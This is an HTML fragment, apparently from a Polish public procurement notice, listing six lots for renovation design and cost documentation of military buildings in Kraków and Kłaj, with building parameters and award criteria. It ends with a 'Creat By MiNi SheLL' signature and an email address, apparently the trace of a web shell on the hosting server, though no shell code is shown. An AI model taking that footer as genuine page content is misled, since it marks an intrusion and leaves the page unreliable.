powierzchnia użytkowa: ok. 1800 m2
powierzchnia zabudowy: ok. 800 m2
kubatura: ok. 8500 m3
budynek posiada dwie kondygnacje nadziemne częściowo podpiwniczony
dach czterospadowy o powierzchni około 1100 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 75.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin Wykonania usługi - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowych remontu pomieszczeń i elewacji budynku nr 3 na terenie kompleksu wojskowego przy ul. Wrocławskiej 82 w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowo-kosztorysowych remontu pomieszczeń i instalacji oraz elewacji budynku nr 3 (sztabowo-koszarowy) na terenie kompleksu wojskowego przy ul. Wrocławskiej 82 w Krakowie. 

BUDYNEK NR 3 - ul. Wrocławska 82 Kraków:

Parametry techniczne budynku:
przeznaczenie budynku: sztabowo-koszarowy
rok budowy: 1918
rok naprawy: 1997
kubatura: 18784 m3
powierzchnia zabudowy: 1301 m2 
budynek posiada  piwnicę oraz trzy kondygnację nadziemne parter, piętro 1 i 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 160.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin wykonania usługi - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowych remontu budynku nr 6 na terenie kompleksu wojskowego przy ul. Wrocławskiej 82 w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowo-kosztorysowych remontu pomieszczeń i instalacji w budynku nr 6 (biurowo-sztabowy) na terenie kompleksu wojskowego przy ul. Wrocławskiej 82 w Krakowie. 

BUDYNEK NR 6 - ul. Wrocławska 82 Kraków:

Parametry techniczne budynku:
przeznaczenie budynku: biurowo-sztabowy
rok budowy: 1918
rok naprawy: 2007
kubatura: 2760 m3
powierzchnia zabudowy: 385 m2 
budynek posiada  piwnicę oraz dwie kondygnację nadziemne parter, piętro 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 80.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin wykonania usługi - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowych remontu pomieszczeń i instalacji w budynku nr 45 na terenie kompleksu wojskowego w miejscowości Kłaj.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowo-kosztorysowych remontu pomieszczeń i instalacji budynku nr 45 na terenie kompleksu wojskowego w miejscowości Kłaj. 


BUDYNEK NR 45 - Kłaj:
Parametry techniczne budynku
przeznaczenie budynku: biurowo-magazynowy
rok budowy: 1953
rok naprawy: 1974
kubatura: 3107 m3
powierzchnia zabudowy: 647 m2 
budynek jednokondygnacyjny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 75.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin wykonania usługi - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowych remontu budynku nr 14 na terenie kompleksu wojskowego ul. Montelupich 3 w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowo-kosztorysowych remontu pomieszczeń i instalacji w budynku nr 14 (hala sportowa/garaż/diagnostyka) na terenie kompleksu wojskowego przy ul. Montelupich 3 w Krakowie. 

BUDYNEK NR 14 - ul. Montelupich 3 Kraków:
Parametry techniczne budynku:
przeznaczenie budynku: hala sportowa / garaż / diagnostyka
rok budowy: 1943
rok naprawy: 1958
kubatura: 12858 m3
powierzchnia zabudowy: 1898 m2 
budynek parterowy podpiwniczony w części nieczynnej kotłowni na paliwo stałe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 80.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Terminwykonania usługi - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowych remontu ośrodka psów OŻW na terenie kompleksu wojskowego przy 
ul. Wrocławskiej 82 w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowo-kosztorysowych remontu ośrodka dla psów Oddziału Żandarmerii Wojskowej na terenie kompleksu wojskowego przy ul. Wrocławskiej 82 w Krakowie. W zakresie sporządzanej dokumentacji jest, remont budynku nr 67 (nieczynna kotłownia), remont wybiegu psów (plac do składowania opału), remont elewacji i dachu budynku.

BUDYNEK NR 67 (nieczynna kotłownia):
Parametry techniczne budynku:
przeznaczenie budynku: kotłownia
rok budowy: 1967
kubatura: 2081 m3
powierzchnia zabudowy: 340 m2 
budynek parterowy z podpiwniczeniem technicznym dla urządzeń kotłowych

WYBIEGU DLA PSÓW (skład opału):
Parametry techniczne:
powierzchnia placu: ok. 800 m2
rodzaj nawierzchni: płyty betonowe
rodzaj ogrodzenia: prefabrykowane z płyt betonowych
długość ogrodzenia: ok. 90 m
budynek parterowy z podpiwniczeniem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 140.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin wykonania usługi - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com